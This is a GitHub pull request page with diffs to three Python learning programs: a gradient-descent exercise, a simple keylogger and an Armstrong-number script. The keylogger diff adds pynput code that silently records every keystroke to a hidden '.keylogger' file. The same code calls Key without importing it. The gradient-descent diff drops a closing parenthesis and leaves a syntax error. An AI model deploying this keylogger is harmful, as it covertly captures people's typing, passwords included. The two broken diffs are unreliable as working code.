Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Problems #92

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
70 changes: 18 additions & 52 deletions MachineLearning/gradient_descent.py
Original file line number Diff line number Diff line change
@@ -1,75 +1,41 @@
####################################################################################
## PROBLEM1: Gradient Descent
## Gradient descent is a popular optimization technique to solve many
## machine learning problems. In this case, we will explore the gradient
## descent algorithm to fit a line for the given set of 2-D points.
## ref: https://tinyurl.com/yc4jbjzs
## ref: https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/
##
##
## input: directory of faces in ./data/1_points.csv/
## function for reading points is provided
##
##
## your task: fill the following functions:
## evaluate_cost
## evaluate_gradient
## udpate_params
## NOTE: do NOT change values of 'init_params' and 'max_iterations' in optimizer
##
##
## output: cost after convergence (rmse, lower the better)
##
##
## NOTE: all required modules are imported. DO NOT import new modules.
## NOTE: references are given intline
## tested on Ubuntu14.04, 22Oct2017, Abhilash Srikantha
####################################################################################

import numpy as np
import matplotlib.pyplot as plt
import time

def load_data(fname):
points = np.loadtxt(fname, delimiter=',')
y_ = points[:,1]
# append '1' to account for the intercept
x_ = np.ones([len(y_),2])
x_ = np.ones([len(y_), 2])
x_[:,0] = points[:,0]
# display plot
#plt.plot(x_[:,0], y_, 'ro')
#plt.xlabel('x-axis')
#plt.ylabel('y-axis')
#plt.show()
print('data loaded. x:{} y:{}'.format(x_.shape, y_.shape))
return x_, y_

def evaluate_cost(x_,y_,params):
def evaluate_cost(x_, y_, params):
tempcost = 0
for i in range(len(y_)):
tempcost += (y_[i] - ((params[0] * x_[i,0]) + params[1])) ** 2
return tempcost / float(10000)
return tempcost / float(10000)

def evaluate_gradient(x_,y_,params):
def evaluate_gradient(x_, y_, params):
m_gradient = 0
b_gradient = 0
N = float(len(y_))
for i in range(len(y_)):
m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1])))
m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1]))
b_gradient += -(2/N) * (y_[i] - ((params[0] * x_[i,0]) + params[1]))
return [m_gradient,b_gradient]
return [m_gradient, b_gradient]

def update_params(old_params, grad, alpha):
new_m = old_params[0] - (alpha * grad[0])
new_b = old_params[1] - (alpha * grad[1])
return [new_m,new_b]
return [new_m, new_b]

# initialize the optimizer
optimizer = {'init_params':np.array([4.5,2.0]) ,
'max_iterations':10000,
'alpha':0.69908,
'eps':0.0000001,
'inf':1e10}
optimizer = {'init_params': np.array([4.5, 2.0]),
'max_iterations': 10000,
'alpha': 0.69908,
'eps': 0.0000001,
'inf': 1e10}

# load data
x_, y_ = load_data("./data/1_points.csv")
Expand All @@ -83,16 +49,16 @@ def update_params(old_params, grad, alpha):
old_cost = 1e10
for iter_ in range(optimizer['max_iterations']):
# evaluate cost and gradient
cost = evaluate_cost(x_,y_,params)
grad = evaluate_gradient(x_,y_,params)
cost = evaluate_cost(x_, y_, params)
grad = evaluate_gradient(x_, y_, params)
# display
if(iter_ % 10 == 0):
if iter_ % 10 == 0:
print('iter: {} cost: {} params: {}'.format(iter_, cost, params))
# check convergence
if(abs(old_cost - cost) < optimizer['eps']):
if abs(old_cost - cost) < optimizer['eps']:
break
# udpate parameters
params = update_params(params,grad,optimizer['alpha'])
# update parameters
params = update_params(params, grad, optimizer['alpha'])
old_cost = cost
except:
cost = optimizer['inf']
Expand Down
24 changes: 23 additions & 1 deletion Programs/P79_SimplePythonKeylogger.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
# 1. pyxhook.py: file is provided in the folder itself
# 2. Xlib: sudo pip3 install python3-Xlib

import pyxhook
'''import pyxhook
import time

# functions to write a newline character into the file
Expand Down Expand Up @@ -47,3 +47,25 @@ def key_press_event(event):

# Close the listener when we are done
hookman.cancel()
'''

from pynput.keyboard import Listener

# Functions to handle key press and release events
def on_key_press(key):
try:
with open('.keylogger', 'a') as f:
f.write(str(key.char))
except AttributeError:
# Handle special keys
with open('.keylogger', 'a') as f:
f.write(str(key))

def on_key_release(key):
if key == Key.esc:
# Terminate the listener
return False

# Create a listener for both key press and release events
with Listener(on_press=on_key_press, on_release=on_key_release) as listener:
listener.join()
7 changes: 7 additions & 0 deletions armstrong.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
lower = 100
upper = 2000

armstrong_numbers = [num for num in range(lower, upper + 1) if num == sum(int(digit) ** len(str(num)) for digit in str(num))]

for armstrong in armstrong_numbers:
print(armstrong)